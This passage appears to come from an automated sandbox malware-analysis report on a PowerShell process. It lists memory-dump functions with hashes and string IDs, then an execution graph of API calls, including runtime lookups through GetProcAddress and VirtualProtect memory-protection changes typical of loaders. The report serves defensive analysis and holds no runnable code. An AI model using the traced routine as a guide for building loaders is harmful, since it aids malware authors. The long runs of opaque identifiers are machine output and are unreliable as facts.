                                                Uniqueness Score: -1.00%

                                                Function 0784EF59 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-2992026589
                                                • Opcode ID: 8f19ccf29ffaf59425f3306909410b24c10cf40e2578087fc14bd1f5d0a42ae9
                                                • Instruction ID: dc08e0bbf1534b7a5d3b3d92afaaf21a4b6326f9ce9ba947d3e09059406925d1
                                                • Opcode Fuzzy Hash: 8f19ccf29ffaf59425f3306909410b24c10cf40e2578087fc14bd1f5d0a42ae9
                                                • Instruction Fuzzy Hash: F8A13CB4A00219DFDB64DF24C951BE9B7B2BB85304F1080E9D609AB381CB759EC5CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07844D15 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-481192504
                                                • Opcode ID: f66afa8d0c75911199595bc3656022e3cb1fecda1589c56dad4b64e3b57a9b4c
                                                • Instruction ID: a17d80b0e96b773d1434124f5b4034e617e6922aebbbc3b65c68e510dd1f1cc9
                                                • Opcode Fuzzy Hash: f66afa8d0c75911199595bc3656022e3cb1fecda1589c56dad4b64e3b57a9b4c
                                                • Instruction Fuzzy Hash: B64119F0A0428EEFDF248F14C548765B7A2EF65324F14C0AAD41CDB295C7B2D840CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078454C8 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-420214106
                                                • Opcode ID: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction ID: 572e8695794032676a6d78f4db7f785ad5847c3967978849565c16cd9647aade
                                                • Opcode Fuzzy Hash: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction Fuzzy Hash: 67218CF122030EDBDB348E05C54063EB7B7AF71665F5A816AF804CB151C7F5D9A0CA51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078400F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$ml$ml
                                                • API String ID: 0-125666307
                                                • Opcode ID: cfd95e63455d6597e1221bd4ba9d1255aa3281301f5c3b9379babc824637dbd2
                                                • Instruction ID: f42418b99b8a16a1ffb8f406e6a90b0a11f8765f32f8350c56044d8acffafa8f
                                                • Opcode Fuzzy Hash: cfd95e63455d6597e1221bd4ba9d1255aa3281301f5c3b9379babc824637dbd2
                                                • Instruction Fuzzy Hash: 3C1129B170030E9BEB245D2AD804727F7B7ABE1760F2880AAE649CB281EAB1C441C351
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784BAF8 Relevance: 5.5, Strings: 4, Instructions: 478COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ocq$(ocq$(ocq$(ocq
                                                • API String ID: 0-2003149739
                                                • Opcode ID: 3a442db56f19fe65f32d21cf9cae78a4ff1df77d81ddfa45d02eb5838b0fba0a
                                                • Instruction ID: 53e3af29b2395dfac5b33b0f976617c6a51fdffbb617ccc164591cd12dfe1120
                                                • Opcode Fuzzy Hash: 3a442db56f19fe65f32d21cf9cae78a4ff1df77d81ddfa45d02eb5838b0fba0a
                                                • Instruction Fuzzy Hash: 0BF104F170434EDFCF258F68C844BAA7FA2AF95324F1484AAE505CB291CBB5D851CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07849BF8 Relevance: 5.3, Strings: 4, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl
                                                • API String ID: 0-2555649572
                                                • Opcode ID: 250e566f6648d90904eeac3cd1d6112d13a89cc2195e4c3b166fe6281ce5a8c5
                                                • Instruction ID: be699ab82c0469d1cb0ed76fac33e237136efd09dbd19a366fa3cfd16353d5a7
                                                • Opcode Fuzzy Hash: 250e566f6648d90904eeac3cd1d6112d13a89cc2195e4c3b166fe6281ce5a8c5
                                                • Instruction Fuzzy Hash: 75A17CB0A0060ADFCB34CF54C545A6BFBF2AFA5714F14C56AD816AB744C7B2B842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07849C20 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl
                                                • API String ID: 0-2555649572
                                                • Opcode ID: b29d9d9d138183e974a4a893d6b62aafeb210f14ed9d05026e85d35b8d2a9338
                                                • Instruction ID: e5fa296826bb5f1fe2086e15d11f222d0701d86b8801b21b939dd375b777c04f
                                                • Opcode Fuzzy Hash: b29d9d9d138183e974a4a893d6b62aafeb210f14ed9d05026e85d35b8d2a9338
                                                • Instruction Fuzzy Hash: DAA15BB0A0060ADFCB34CF54C545A6BF7F2AFA9714F14C52AD916AB744C7B2B842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784A638 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl
                                                • API String ID: 0-2555649572
                                                • Opcode ID: f605d7cb62c837fb3ca3e1788a64fff750771cc9614cc7bc43e10c5fba60e951
                                                • Instruction ID: b42e8b2aea70b6e4d20ce735bef2a0cfc70d9ad1e03cd63477b524675a3782a3
                                                • Opcode Fuzzy Hash: f605d7cb62c837fb3ca3e1788a64fff750771cc9614cc7bc43e10c5fba60e951
                                                • Instruction Fuzzy Hash: A0717DB0A00109DFCB28CF98C551AAABBB2EF99314F15C069D815EF755DB72DC41CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078457B0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 0448c77604c57b55c1cc3b3a0ccd54896ff98d859aca5af793e78c33cbff5e6d
                                                • Instruction ID: 19b9e5cc2246340926a900228a740787e026ab5ed6322c5e6e6d81b34f5c23ad
                                                • Opcode Fuzzy Hash: 0448c77604c57b55c1cc3b3a0ccd54896ff98d859aca5af793e78c33cbff5e6d
                                                • Instruction Fuzzy Hash: F5315BB170031AABDA245D39980173F7A8A8FD0B18F14443DE502CF382EDA5DD5083A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078463E0 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$84ul$tPcq$tPcq
                                                • API String ID: 0-973537647
                                                • Opcode ID: cba80ebfbd225392c5419e5e673011ec15850ce2d1a6fea67e1718d3018c7fc7
                                                • Instruction ID: 502e96729d33e81a168990430b47d06533a8a55ffa02b1026ed7f82e95189ea3
                                                • Opcode Fuzzy Hash: cba80ebfbd225392c5419e5e673011ec15850ce2d1a6fea67e1718d3018c7fc7
                                                • Instruction Fuzzy Hash: 63316BF0B013595FCB119F58881462EBFB6AF86710F5480AAD484DF392DB719C84C3E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07840CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 6021d4d20c1f87c24bdbeeb42674b372acc67516789aa5dc37cfa3958226e928
                                                • Instruction ID: 5cc9769c99b179ed3a9d4b526bdf080d7cfa9c0d61f96d2cb11892b81a5605ec
                                                • Opcode Fuzzy Hash: 6021d4d20c1f87c24bdbeeb42674b372acc67516789aa5dc37cfa3958226e928
                                                • Instruction Fuzzy Hash: A3216BB531031E9BDF345D7998047237A9A9BE4325F24816AE609CB382DEB5D8458362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784AEB8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 51e6497b19d6b0e9402f2107bb4cb681620169668ea770551d35ab33ba79e579
                                                • Instruction ID: 79611850d812f4b02b78e3b2d2b9a5d80a89b1dd503b63ff821f120c7ef7f71b
                                                • Opcode Fuzzy Hash: 51e6497b19d6b0e9402f2107bb4cb681620169668ea770551d35ab33ba79e579
                                                • Instruction Fuzzy Hash: DA11ACF5A9120E9BCF288F59C54066AB7F5ABB5210F54C06BE805CF242D7B1C584CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078417A1 Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq
                                                • API String ID: 0-1126079151
                                                • Opcode ID: ea6862f1a0aaf0cecb4d3e599d62e9a6e7a0b8fa68e4d47ef2ab245a0c54a70e
                                                • Instruction ID: 002f02ea13afd953b5eec6f88fc292f6b5da519b9f3073a9164096b43233c694
                                                • Opcode Fuzzy Hash: ea6862f1a0aaf0cecb4d3e599d62e9a6e7a0b8fa68e4d47ef2ab245a0c54a70e
                                                • Instruction Fuzzy Hash: 5601A760A1D38E4FC7274B6818241126F73AF9351071A01A7C181DF393CA999D85C3A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:2.7%
                                                Total number of Nodes:1660
                                                Total number of Limit Nodes:5
                                                execution_graph 6432 222e506f 6433 222e5087 6432->6433 6434 222e5081 6432->6434 6435 222e5000 20 API calls 6434->6435 6435->6433 7012 222e60ac 7013 222e60b7 7012->7013 7015 222e60dd 7012->7015 7014 222e60c7 FreeLibrary 7013->7014 7013->7015 7014->7013 6004 222e742b 6005 222e7430 6004->6005 6006 222e7453 6005->6006 6008 222e8bae 6005->6008 6009 222e8bbb 6008->6009 6010 222e8bdd 6008->6010 6011 222e8bc9 RtlDeleteCriticalSection 6009->6011 6012 222e8bd7 6009->6012 6010->6005 6011->6011 6011->6012 6013 222e571e _free 20 API calls 6012->6013 6013->6010 6436 222eac6b 6437 222eac84 __startOneArgErrorHandling 6436->6437 6438 222eacad __startOneArgErrorHandling 6437->6438 6440 222eb2f0 6437->6440 6441 222eb329 __startOneArgErrorHandling 6440->6441 6443 222eb350 __startOneArgErrorHandling 6441->6443 6451 222eb5c1 6441->6451 6444 222eb393 6443->6444 6445 222eb36e 6443->6445 6464 222eb8b2 6444->6464 6455 222eb8e1 6445->6455 6448 222eb38e __startOneArgErrorHandling 6449 222e2ada _ValidateLocalCookies 5 API calls 6448->6449 6450 222eb3b7 6449->6450 6450->6438 6452 222eb5ec __raise_exc 6451->6452 6453 222eb7e5 RaiseException 6452->6453 6454 222eb7fd 6453->6454 6454->6443 6456 222eb8f0 6455->6456 6457 222eb90f __startOneArgErrorHandling 6456->6457 6458 222eb964 __startOneArgErrorHandling 6456->6458 6471 222e78a3 6457->6471 6459 222eb8b2 __startOneArgErrorHandling 20 API calls 6458->6459 6463 222eb95d 6459->6463 6462 222eb8b2 __startOneArgErrorHandling 20 API calls 6462->6463 6463->6448 6465 222eb8bf 6464->6465 6466 222eb8d4 6464->6466 6468 222e6368 __dosmaperr 20 API calls 6465->6468 6469 222eb8d9 6465->6469 6467 222e6368 __dosmaperr 20 API calls 6466->6467 6467->6469 6470 222eb8cc 6468->6470 6469->6448 6470->6448 6474 222e78cb 6471->6474 6472 222e2ada _ValidateLocalCookies 5 API calls 6473 222e78e8 6472->6473 6473->6462 6473->6463 6474->6472 5972 222ec7a7 5973 222ec7be 5972->5973 5982 222ec82c 5972->5982 5973->5982 5984 222ec7e6 GetModuleHandleA 5973->5984 5974 222ec835 GetModuleHandleA 5977 222ec83f 5974->5977 5975 222ec872 5977->5977 5979 222ec85f GetProcAddress 5977->5979 5977->5982 5978 222ec7dd 5978->5977 5980 222ec800 GetProcAddress 5978->5980 5978->5982 5979->5982 5981 222ec80d VirtualProtect 5980->5981 5980->5982 5981->5982 5983 222ec81c VirtualProtect 5981->5983 5982->5974 5982->5975 5982->5977 5983->5982 5985 222ec7ef 5984->5985 5990 222ec82c 5984->5990 5996 222ec803 GetProcAddress 5985->5996 5987 222ec7f4 5987->5990 5991 222ec800 GetProcAddress 5987->5991 5988 222ec835 GetModuleHandleA 5994 222ec83f 5988->5994 5989 222ec872 5990->5988 5990->5989 5990->5994 5991->5990 5992 222ec80d VirtualProtect 5991->5992 5992->5990 5993 222ec81c VirtualProtect 5992->5993 5993->5990 5994->5990 5995 222ec85f GetProcAddress 5994->5995 5995->5990 5997 222ec82c 5996->5997 5998 222ec80d VirtualProtect 5996->5998 6000 222ec835 GetModuleHandleA 5997->6000 6001 222ec872 5997->6001 5998->5997 5999 222ec81c VirtualProtect 5998->5999 5999->5997 6003 222ec83f 6000->6003 6002 222ec85f GetProcAddress 6002->6003 6003->5997 6003->6002 7016 222e81a0 7017 222e81d9 7016->7017 7018 222e81dd 7017->7018 7029 222e8205 7017->7029 7019 222e6368 __dosmaperr 20 API calls 7018->7019 7021 222e81e2 7019->7021 7020 222e8529 7023 222e2ada _ValidateLocalCookies 5 API calls 7020->7023 7022 222e62ac _abort 26 API calls 7021->7022 7024 222e81ed 7022->7024 7025 222e8536 7023->7025 7026 222e2ada _ValidateLocalCookies 5 API calls 7024->7026 7027 222e81f9 7026->7027 7029->7020 7030 222e80c0 7029->7030 7033 222e80db 7030->7033 7031 222e2ada _ValidateLocalCookies 5 API calls 7032 222e8152 7031->7032 7032->7029 7033->7031 7284 222ea1e0 7287 222ea1fe 7284->7287 7286 222ea1f6 7288 222ea203 7287->7288 7289 222eaa53 21 API calls 7288->7289 7290 222ea298 7288->7290 7291 222ea42f 7289->7291 7290->7286 7291->7286 7034 222e21a1 ___scrt_dllmain_exception_filter 6014 222e1f3f 6015 222e1f4b ___DestructExceptionObject 6014->6015 6032 222e247c 6015->6032 6017 222e1f52 6018 222e1f7c 6017->6018 6019 222e2041 6017->6019 6028 222e1f57 ___scrt_is_nonwritable_in_current_image 6017->6028 6043 222e23de 6018->6043 6059 222e2639 IsProcessorFeaturePresent 6019->6059 6022 222e2048 6023 222e1f8b __RTC_Initialize 6023->6028 6046 222e22fc RtlInitializeSListHead 6023->6046 6025 222e1f99 ___scrt_initialize_default_local_stdio_options 6047 222e46c5 6025->6047 6030 222e1fb8 6030->6028 6055 222e4669 6030->6055 6033 222e2485 6032->6033 6063 222e2933 IsProcessorFeaturePresent 6033->6063 6037 222e2496 6042 222e249a 6037->6042 6074 222e53c8 6037->6074 6040 222e24b1 6040->6017 6042->6017 6148 222e24b5 6043->6148 6045 222e23e5 6045->6023 6046->6025 6050 222e46dc 6047->6050 6048 222e2ada _ValidateLocalCookies 5 API calls 6049 222e1fad 6048->6049 6049->6028 6051 222e23b3 6049->6051 6050->6048 6052 222e23b8 ___scrt_release_startup_lock 6051->6052 6053 222e23c1 6052->6053 6054 222e2933 ___isa_available_init IsProcessorFeaturePresent 6052->6054 6053->6030 6054->6053 6058 222e4698 6055->6058 6056 222e2ada _ValidateLocalCookies 5 API calls 6057 222e46c1 6056->6057 6057->6028 6058->6056 6060 222e264e ___scrt_fastfail 6059->6060 6061 222e26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6060->6061 6062 222e2744 ___scrt_fastfail 6061->6062 6062->6022 6064 222e2491 6063->6064 6065 222e34ea 6064->6065 6066 222e34ef ___vcrt_initialize_winapi_thunks 6065->6066 6085 222e3936 6066->6085 6070 222e3505 6071 222e3510 6070->6071 6099 222e3972 6070->6099 6071->6037 6073 222e34fd 6073->6037 6140 222e7457 6074->6140 6077 222e3529 6078 222e3532 6077->6078 6084 222e3543 6077->6084 6079 222e391b ___vcrt_uninitialize_ptd 6 API calls 6078->6079 6080 222e3537 6079->6080 6081 222e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6080->6081 6082 222e353c 6081->6082 6144 222e3c50 6082->6144 6084->6042 6086 222e393f 6085->6086 6088 222e3968 6086->6088 6090 222e34f9 6086->6090 6103 222e3be0 6086->6103 6089 222e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6088->6089 6089->6090 6090->6073 6091 222e38e8 6090->6091 6121 222e3af1 6091->6121 6094 222e38fd 6094->6070 6097 222e3918 6097->6070 6100 222e397d 6099->6100 6102 222e399c 6099->6102 6101 222e3987 RtlDeleteCriticalSection 6100->6101 6101->6101 6101->6102 6102->6073 6108 222e3a82 6103->6108 6105 222e3bfa 6106 222e3c18 InitializeCriticalSectionAndSpinCount 6105->6106 6107 222e3c03 6105->6107 6106->6107 6107->6086 6109 222e3aaa 6108->6109 6110 222e3aa6 __crt_fast_encode_pointer 6108->6110 6109->6110 6114 222e39be 6109->6114 6110->6105 6113 222e3ac4 GetProcAddress 6113->6110 6119 222e39cd try_get_first_available_module 6114->6119 6115 222e39ea LoadLibraryExW 6117 222e3a05 GetLastError 6115->6117 6115->6119 6116 222e3a77 6116->6110 6116->6113 6117->6119 6118 222e3a60 FreeLibrary 6118->6119 6119->6115 6119->6116 6119->6118 6120 222e3a38 LoadLibraryExW 6119->6120 6120->6119 6122 222e3a82 try_get_function 5 API calls 6121->6122 6123 222e3b0b 6122->6123 6124 222e3b24 TlsAlloc 6123->6124 6125 222e38f2 6123->6125 6125->6094 6126 222e3ba2 6125->6126 6127 222e3a82 try_get_function 5 API calls 6126->6127 6128 222e3bbc 6127->6128 6129 222e3bd7 TlsSetValue 6128->6129 6130 222e390b 6128->6130 6129->6130 6130->6097 6131 222e391b 6130->6131 6132 222e3925 6131->6132 6133 222e392b 6131->6133 6135 222e3b2c 6132->6135 6133->6094 6136 222e3a82 try_get_function 5 API calls 6135->6136 6137 222e3b46 6136->6137 6138 222e3b5e TlsFree 6137->6138 6139 222e3b52 6137->6139 6138->6139 6139->6133 6143 222e7470 6140->6143 6141 222e2ada _ValidateLocalCookies 5 API calls 6142 222e24a3 6141->6142 6142->6040 6142->6077 6143->6141 6145 222e3c59 6144->6145 6147 222e3c7f 6144->6147 6146 222e3c69 FreeLibrary 6145->6146 6145->6147 6146->6145 6147->6084 6149 222e24c8 6148->6149 6150 222e24c4 6148->6150 6151 222e2639 ___scrt_fastfail 4 API calls 6149->6151 6153 222e24d5 ___scrt_release_startup_lock 6149->6153 6150->6045 6152 222e2559 6151->6152 6153->6045 7035 222e67bf 7040 222e67f4 7035->7040 7038 222e67db 7039 222e571e _free 20 API calls 7039->7038 7041 222e6806 7040->7041 7049 222e67cd 7040->7049 7042 222e680b 7041->7042 7043 222e6836 7041->7043 7044 222e637b _abort 20 API calls 7042->7044 7043->7049 7051 222e71d6 7043->7051 7046 222e6814 7044->7046 7048 222e571e _free 20 API calls 7046->7048 7047 222e6851 7050 222e571e _free 20 API calls 7047->7050 7048->7049 7049->7038 7049->7039 7050->7049 7052 222e71e1 7051->7052 7053 222e7209 7052->7053 7055 222e71fa 7052->7055 7054 222e7218 7053->7054 7060 222e8a98 7053->7060 7067 222e8acb 7054->7067 7057 222e6368 __dosmaperr 20 API calls 7055->7057 7059 222e71ff ___scrt_fastfail 7057->7059 7059->7047 7061 222e8ab8 RtlSizeHeap 7060->7061 7062 222e8aa3 7060->7062 7061->7054 7063 222e6368 __dosmaperr 20 API calls 7062->7063 7064 222e8aa8 7063->7064 7065 222e62ac _abort 26 API calls 7064->7065 7066 222e8ab3 7065->7066 7066->7054 7068 222e8ad8 7067->7068 7069 222e8ae3 7067->7069 7079 222e56d0 7068->7079 7071 222e8aeb 7069->7071 7077 222e8af4 _abort 7069->7077 7072 222e571e _free 20 API calls 7071->7072 7075 222e8ae0 7072->7075 7073 222e8b1e RtlReAllocateHeap 7073->7075 7073->7077 7074 222e8af9 7076 222e6368 __dosmaperr 20 API calls 7074->7076 7075->7059 7076->7075 7077->7073 7077->7074 7078 222e474f _abort 7 API calls 7077->7078 7078->7077 7080 222e570e 7079->7080 7084 222e56de _abort 7079->7084 7082 222e6368 __dosmaperr 20 API calls 7080->7082 7081 222e56f9 RtlAllocateHeap 7083 222e570c 7081->7083 7081->7084 7082->7083 7083->7075 7084->7080 7084->7081 7085 222e474f _abort 7 API calls 7084->7085 7085->7084 7292 222e5bff 7300 222e5d5c 7292->7300 7295 222e5b7a _abort 20 API calls 7296 222e5c1b 7295->7296 7297 222e5c28 7296->7297 7298 222e5c2b 11 API calls 7296->7298 7299 222e5c13 7298->7299 7301 222e5c45 _abort 5 API calls 7300->7301 7302 222e5d83 7301->7302 7303 222e5d9b TlsAlloc 7302->7303 7304 222e5d8c 7302->7304 7303->7304 7305 222e2ada _ValidateLocalCookies 5 API calls 7304->7305 7306 222e5c09 7305->7306 7306->7295 7306->7299 6154 222e543d 6155 222e5440 6154->6155 6158 222e55a8 6155->6158 6169 222e7613 6158->6169 6161 222e55b8 6163 222e55c2 IsProcessorFeaturePresent 6161->6163 6168 222e55e0 6161->6168 6164 222e55cd 6163->6164 6199 222e60e2 6164->6199 6205 222e4bc1 6168->6205 6208 222e7581 6169->6208 6172 222e766e 6173 222e767a _abort 6172->6173 6174 222e5b7a _abort 20 API calls 6173->6174 6179 222e76a7 _abort 6173->6179 6181 222e76a1 _abort 6173->6181 6174->6181 6175 222e76f3 6177 222e6368 __dosmaperr 20 API calls 6175->6177 6176 222e76d6 6254 222ebdc9 6176->6254 6178 222e76f8 6177->6178 6222 222e62ac 6178->6222 6185 222e771f 6179->6185 6225 222e5671 RtlEnterCriticalSection 6179->6225 6181->6175 6181->6176 6181->6179 6186 222e777e 6185->6186 6188 222e7776 6185->6188 6192 222e77a9 6185->6192 6226 222e56b9 RtlLeaveCriticalSection 6185->6226 6186->6192 6227 222e7665 6186->6227 6191 222e4bc1 _abort 28 API calls 6188->6191 6191->6186 6230 222e782e 6192->6230 6193 222e780c 6193->6176 6198 222e5af6 _abort 38 API calls 6193->6198 6197 222e7665 _abort 38 API calls 6197->6192 6198->6176 6200 222e60fe ___scrt_fastfail 6199->6200 6201 222e612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6200->6201 6202 222e61fb ___scrt_fastfail 6201->6202 6203 222e2ada _ValidateLocalCookies 5 API calls 6202->6203 6204 222e6219 6203->6204 6204->6168 6273 222e499b 6205->6273 6211 222e7527 6208->6211 6210 222e55ad 6210->6161 6210->6172 6212 222e7533 ___DestructExceptionObject 6211->6212 6217 222e5671 RtlEnterCriticalSection 6212->6217 6214 222e7541 6218 222e7575 6214->6218 6216 222e7568 _abort 6216->6210 6217->6214 6221 222e56b9 RtlLeaveCriticalSection 6218->6221 6220 222e757f 6220->6216 6221->6220 6257 222e6231 6222->6257 6224 222e62b8 6224->6176 6225->6185 6226->6188 6228 222e5af6 _abort 38 API calls 6227->6228 6229 222e766a 6228->6229 6229->6197 6231 222e7834 6230->6231 6233 222e77fd 6230->6233 6272 222e56b9 RtlLeaveCriticalSection 6231->6272 6233->6176 6233->6193 6234 222e5af6 GetLastError 6233->6234 6235 222e5b0c 6234->6235 6238 222e5b12 6234->6238 6237 222e5e08 _abort 11 API calls 6235->6237 6236 222e637b _abort 20 API calls 6239 222e5b24 6236->6239 6237->6238 6238->6236 6240 222e5b61 SetLastError 6238->6240 6241 222e5b2c 6239->6241 6242 222e5e5e _abort 11 API calls 6239->6242 6240->6193 6243 222e571e _free 20 API calls 6241->6243 6244 222e5b41 6242->6244 6245 222e5b32 6243->6245 6244->6241 6246 222e5b48 6244->6246 6247 222e5b6d SetLastError 6245->6247 6248 222e593c _abort 20 API calls 6246->6248 6249 222e55a8 _abort 35 API calls 6247->6249 6250 222e5b53 6248->6250 6251 222e5b79 6249->6251 6252 222e571e _free 20 API calls 6250->6252 6253 222e5b5a 6252->6253 6253->6240 6253->6247 6255 222e2ada _ValidateLocalCookies 5 API calls 6254->6255 6256 222ebdd4 6255->6256 6256->6256 6258 222e5b7a _abort 20 API calls 6257->6258 6259 222e6247 6258->6259 6260 222e62a6 6259->6260 6263 222e6255 6259->6263 6268 222e62bc IsProcessorFeaturePresent 6260->6268 6262 222e62ab 6264 222e6231 _abort 26 API calls 6262->6264 6265 222e2ada _ValidateLocalCookies 5 API calls 6263->6265 6266 222e62b8 6264->6266 6267 222e627c 6265->6267 6266->6224 6267->6224 6269 222e62c7 6268->6269 6270 222e60e2 _abort 8 API calls 6269->6270 6271 222e62dc GetCurrentProcess TerminateProcess 6270->6271 6271->6262 6272->6233 6274 222e49a7 _abort 6273->6274 6275 222e49bf 6274->6275 6295 222e4af5 GetModuleHandleW 6274->6295 6304 222e5671 RtlEnterCriticalSection 6275->6304 6281 222e49c7 6284 222e4a3c 6281->6284 6293 222e4a65 6281->6293 6305 222e527a 6281->6305 6283 222e4a54 6289 222e4669 _abort 5 API calls 6283->6289 6284->6283 6288 222e4669 _abort 5 API calls 6284->6288 6285 222e4aae 6287 222ebdc9 _abort 5 API calls 6285->6287 6286 222e4a82 6311 222e4ab4 6286->6311 6292 222e4ab3 6287->6292 6288->6283 6289->6293 6308 222e4aa5 6293->6308 6296 222e49b3 6295->6296 6296->6275 6297 222e4b39 GetModuleHandleExW 6296->6297 6298 222e4b63 GetProcAddress 6297->6298 6299 222e4b78 6297->6299 6298->6299 6300 222e4b8c FreeLibrary 6299->6300 6301 222e4b95 6299->6301 6300->6301 6302 222e2ada _ValidateLocalCookies 5 API calls 6301->6302 6303 222e4b9f 6302->6303 6303->6275 6304->6281 6319 222e5132 6305->6319 6341 222e56b9 RtlLeaveCriticalSection 6308->6341 6310 222e4a7e 